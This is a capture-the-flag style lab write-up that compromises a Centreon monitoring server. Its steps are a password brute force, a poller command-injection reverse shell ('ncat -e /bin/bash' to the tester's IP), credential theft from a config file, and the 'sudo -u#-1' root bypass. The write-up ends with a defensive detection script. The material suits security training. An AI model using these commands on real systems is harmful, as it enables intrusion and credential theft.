Web | Medium | Linux
VHL — Mon02
Centreon IT monitoring platform on Red Hat. Default credentials lead to authenticated RCE via malicious poller command injection.
February 16, 2025 | Virtual Hacking Labs
#Centreon #Default Creds #Command Injection #RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.2.244
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 18:50 EST
Nmap scan report for 10.11.2.244
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:3e:25:b0:d3:1c:75:86:dc:80:dd:25:3a:07:e0:5e (RSA)
| 256 b4:a7:a3:10:64:09:d4:48:f6:e0:a9:60:98:9f:30:ee (ECDSA)
|_ 256 74:4e:75:19:ff:23:40:0b:30:b4:18:51:47:18:aa:9b (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Red Hat))
| http-title: Centreon - IT & Network Monitoring
|_Requested resource was http://10.11.2.244/centreon/
|_http-server-header: Apache/2.4.34 (Red Hat)
|_http-generator: Centreon - Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
3306/tcp open mysql MariaDB (unauthorized)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
80
sh
80/tcp open http Apache httpd 2.4.34 ((Red Hat))
| http-title: Centreon - IT & Network Monitoring
|_Requested resource was http://10.11.2.244/centreon/
|_http-server-header: Apache/2.4.34 (Red Hat)
|_http-generator: Centreon - Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Centreon-v19.04-Brute-Forcer-RCE
- https://github.com/heartburn-dev/Centreon-v19.04-Brute-Forcer-RCE

sh
python2 magic.py -t 10.11.2.244 -p 80 -m 1
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
:::: :::: ::: :::::::: ::::::::::: ::::::::
+:+:+: :+:+:+ :+: :+: :+: :+: :+: :+: :+:
+:+ +:+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +#++:++#++: :#: +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#
### ### ### ### ######## ########### ########
By a very tired 0xskunk
[!] Example Usage [!]
----------------------------------------
[1] Brute Force Mode [1]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 1
----------------------------------------
[2] RCE Mode [2]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 2
----------------------------------------
[3] Reverse Shell Mode [3]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 3 -i 192.168.69.1 -l 443
----------------------------------------
[*] I need to know if your target is running SSL or not!
[?] HTTP (1) or HTTPS (2): 1
[*] Target: http://10.11.2.244:80/centreon/index.php
[*] Now I'm gonna need a username..
[?] Username: admin
[*] Now I'm gonna need a wordlist to use. Absolute path would be ideal (/usr/share/wordlists/rockyou.txt)?
[?] Wordlist: /usr/share/wordlists/rockyou.txt
[!] This won't be quiet.. Would you like to set a delay between requests? (Just put 0 if not)
[?] Delay: 0
[!] CSRF Token on this run = ad53fa8c...
[0] Attempting to login with password: 123456
[!] CSRF Token on this run = b94dba45...
[1] Attempting to login with password: 12345
[!] CSRF Token on this run = 31688535...
[2] Attempting to login with password: 123456789
[!] CSRF Token on this run = 2109f3c5...
[3] Attempting to login with password: password
[!] CSRF Token on this run = b8ee54e4...
[4] Attempting to login with password: iloveyou
[!] CSRF Token on this run = 46c4650c...
[5] Attempting to login with password: princess
[!] CSRF Token on this run = 81f41528...
[6] Attempting to login with password: 1234567
[!] CSRF Token on this run = 7cd0e45c...
[7] Attempting to login with password: rockyou
[!] CSRF Token on this run = adb8dadd...
[8] Attempting to login with password: 12345678
[!] CSRF Token on this run = 32736173...
[9] Attempting to login with password: abc123
[!] CSRF Token on this run = faacec48...
[10] Attempting to login with password: nicole
[!] CSRF Token on this run = 36e743be...
[11] Attempting to login with password: daniel
[!] CSRF Token on this run = 1638293f...
[12] Attempting to login with password: babygirl
[!] CSRF Token on this run = 4fed9833...
[13] Attempting to login with password: monkey
[!] CSRF Token on this run = e8d8b5ce...
[14] Attempting to login with password: lovely
[!] CSRF Token on this run = d82b5bff...
[15] Attempting to login with password: jessica
[!] CSRF Token on this run = a365f12c...
[16] Attempting to login with password: 654321
[!] CSRF Token on this run = 73b27607...
[17] Attempting to login with password: michael
[!] CSRF Token on this run = 8fda9160...
[18] Attempting to login with password: ashley
[!] CSRF Token on this run = 85679c93...
[19] Attempting to login with password: qwerty
[!] CSRF Token on this run = 3a6cc976...
[20] Attempting to login with password: 111111
[!] CSRF Token on this run = 736482e2...
[21] Attempting to login with password: iloveu
[!] CSRF Token on this run = af639509...
[22] Attempting to login with password: 000000
[!] CSRF Token on this run = a7f3fb58...
[23] Attempting to login with password: michelle
[!] CSRF Token on this run = 4c2c8e1a...
[24] Attempting to login with password: tigger
[!] CSRF Token on this run = 9fc7f1d5...
[25] Attempting to login with password: sunshine
[*] Password sunshine is correct.
[*] Bye for now. Hope you got what you needed!
creds
admin:sunshine
reverse shell as apache
sh
python2 magic.py -t 10.11.2.244 -p 80 -m 3 -i 172.16.1.1 -l 1234
[*] I need to know if your target is running SSL or not!
[?] HTTP (1) or HTTPS (2): 1
[*] Target: http://10.11.2.244:80/centreon/index.php
[*] Now I'm gonna need a username..
[?] Username: admin
[*] And now I'm gonna need the password sir.
[*] Password: sunshine
[!] CSRF Token on this run = a81df156...
[*] We found the poller token: 6dd8485c...
[*] Command: ncat -e /bin/bash 172.16.1.1 1234 #
[*] Payload has been injected.. Executing command...
sh
rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.2.244] 32824
whoami
apache
priv esc
sh
Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
sh
python -c 'import pty; pty.spawn("/bin/bash")'
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/sudo
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.1.38-MariaDB, for Linux (x86_64) using readline 5.1
sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 127.0.0.1:199 *:*
tcp LISTEN 0 128 127.0.0.1:9000 *:* users:(("php-fpm",pid=7041,fd=0),("php-fpm",pid=7040,fd=0),("php-fpm",pid=7039,fd=0),("php-fpm",pid=7038,fd=0),("php-fpm",pid=7037,fd=0))
tcp LISTEN 0 128 127.0.0.1:9042 *:* users:(("php-fpm",pid=20891,fd=0),("php-fpm",pid=20869,fd=0),("ncat",pid=20853,fd=0),("php-fpm",pid=20848,fd=0))
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 127.0.0.1:25 *:*
tcp LISTEN 0 80 :::3306 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 100 ::1:25 :::*
sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.10.0-957.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Thu Nov 8 23:39:32 UTC 2018
LSB Version: :core-4.1-amd64:core-4.1-noarch:cxx-4.1-amd64:cxx-4.1-noarch:desktop-4.1-amd64:desktop-4.1-noarch:languages-4.1-amd64:languages-4.1-noarch:printing-4.1-amd64:printing-4.1-noarch
Distributor ID: CentOS
Description: CentOS Linux release 7.6.1810 (Core)
Release: 7.6.1810
Codename: Core
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23
sh
Group centreon-engine:
/etc/centreon-engine
/etc/centreon-engine/objects
/etc/centreon-engine/objects/commands.cfg
/etc/centreon-engine/objects/contacts.cfg
/etc/centreon-engine/objects/localhost.cfg
/etc/centreon-engine/objects/printer.cfg
/etc/centreon-engine/objects/switch.cfg
#)You_can_write_even_more_files_inside_last_directory
/etc/centreon-engine/centengine.cfg
/etc/centreon-engine/resource.cfg
/etc/centreon-engine/conf.d
/etc/centreon-engine/conf.d/cbmod.cfg
/var/lib/centreon-engine/rw
Group centreon-broker:
/etc/centreon-broker
/etc/centreon-broker/central-broker.xml
/etc/centreon-broker/central-rrd.xml
/etc/centreon-broker/watchdog.xml
/etc/centreon-broker/poller-module.xml
/var/lib/centreon-broker
/var/lib/centreon-broker/.bash_logout
/var/lib/centreon-broker/.bash_profile
/var/lib/centreon-broker/.bashrc
/var/log/centreon-broker
/usr/share/centreon-broker
/usr/share/centreon-broker/lua
awk: cmd. line:1: (FILENAME=- FNR=1113) fatal: print to "standard output" failed (Broken pipe)
grep: write error
Group centreon:
/etc/snmp/centreon_traps
/etc/centreon
/etc/centreon/conf.pm
/etc/centreon/instCentCore.conf
/etc/centreon/license.d
/etc/centreon/instCentPlugins.conf
/etc/centreon/instCentWeb.conf
/var/lib/centreon
/var/lib/centreon/centplugins
/var/lib/centreon/centcore
/var/lib/centreon/log
/var/lib/centreon/metrics
/var/lib/centreon/nagios-perf
/var/log/centreon
/var/cache/centreon/backup
centreon config file
sh
bash-4.2$ cat centreon.conf.php
cat centreon.conf.php
<?php
/*
* Centreon is developped with GPL Licence 2.0 :
* http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
* Developped by : Julien Mathis - Romain Le Merlus - Christophe Coraboeuf
*
* The Software is provided to you AS IS and WITH ALL FAULTS.
* Centreon makes no representation and gives no warranty whatsoever,
* whether express or implied, and without limitation, with regard to the quality,
* safety, contents, performance, merchantability, non-infringement or suitability for
* any particular or intended purpose of the Software found on the Centreon web site.
* In no event will Centreon be liable for any direct, indirect, punitive, special,
* incidental or consequential damages however they may arise and even if Centreon has
* been previously advised of the possibility of such damages.
*
* For information : contact@centreon.com
*/
/* Database */
$conf_centreon['hostCentreon'] = "localhost";
$conf_centreon['hostCentstorage'] = "localhost";
$conf_centreon['user'] = "mon02";
$conf_centreon['password'] = 'AkkWqp123';
$conf_centreon['db'] = "centreon";
$conf_centreon['dbcstg'] = "centreon_storage";
$conf_centreon['port'] = "3306";
/* path to classes */
$classdir='./class';
/* Centreon Path */
$centreon_path='/usr/share/centreon/';
creds
mon02:AkkWqp123
ssh as mon02
sh
ssh mon02@10.11.2.244
mon02@10.11.2.244's password: AkkWqp123
[mon02@localhost ~]$ whoami
mon02
sh
[mon02@localhost ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for mon02:
Matching Defaults entries for mon02 on localhost:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User mon02 may run the following commands on localhost:
(ALL, !root) ALL
sudo security bypass
sh
[mon02@localhost ~]$ sudo -u#-1 /bin/bash
[sudo] password for mon02:
bash-4.2# whoami
root
bash-4.2# cat /root/key.txt
vblhtebxwf1wwppmret3
bash-4.2# date
Mon Feb 17 04:10:38 CET 2025
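A defender-side check for the sudo rule shown above, as an added example that is not part of the original writeup: it parses `sudo -l` output for Runas lists that grant `ALL` and then exclude users by negation, and flags log or command-line records where sudo was pointed at UID `-1` or its unsigned form `4294967295`. The function names are hypothetical, the `backup` rule and the log lines are constructed samples, and the log layout is an assumption.

```python
import re

# One rule line as printed by `sudo -l`: "(users[ : groups]) [TAG:] commands"
ENTRY = re.compile(r"^\s*\(([^)]*)\)\s*(.*)$")
# sudo asked to run as UID -1 or its unsigned 32-bit form, in a sudo log
# record (USER=...) or on a recorded command line (-u...)
RUNAS_UID = re.compile(r"(?:USER=|-u\s*)#(?:-1|4294967295)\b")

def audit_sudo_l(text):
    """Flag Runas user lists that grant ALL and then subtract users with '!'."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = ENTRY.match(line) if in_rules else None
        if not m:
            continue
        users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        negated = [u for u in users if u.startswith("!")]
        if "ALL" in users and negated:
            findings.append({"runas": users, "negated": negated,
                             "commands": m.group(2).strip()})
    return findings

def flag_runas_uid(log_lines):
    """Return log lines in which sudo was pointed at UID -1 / 4294967295."""
    return [line for line in log_lines if RUNAS_UID.search(line)]

# First rule is the one from the writeup; the `backup` rule is constructed.
SUDO_L_OUTPUT = """\
User mon02 may run the following commands on localhost:
    (ALL, !root) ALL
    (backup) NOPASSWD: /usr/bin/rsync
"""

# Constructed log lines; the layout is assumed to follow sudo's syslog records.
SAMPLE_LOGS = [
    "Feb 17 04:10:01 localhost sudo: mon02 : TTY=pts/0 ; PWD=/home/mon02 ; USER=#-1 ; COMMAND=/bin/bash",
    "Feb 17 04:12:44 localhost sudo: mon02 : TTY=pts/0 ; PWD=/home/mon02 ; USER=backup ; COMMAND=/usr/bin/rsync -a /srv /mnt",
    'argc=3 a0="sudo" a1="-u#4294967295" a2="/bin/bash"',
]

if __name__ == "__main__":
    for f in audit_sudo_l(SUDO_L_OUTPUT):
        print("negated Runas list:", f["runas"], "->", f["commands"])
    for line in flag_runas_uid(SAMPLE_LOGS):
        print("runas by raw UID:", line)
```

Rewriting a flagged rule so that it names the permitted target users explicitly removes the dependence on negation.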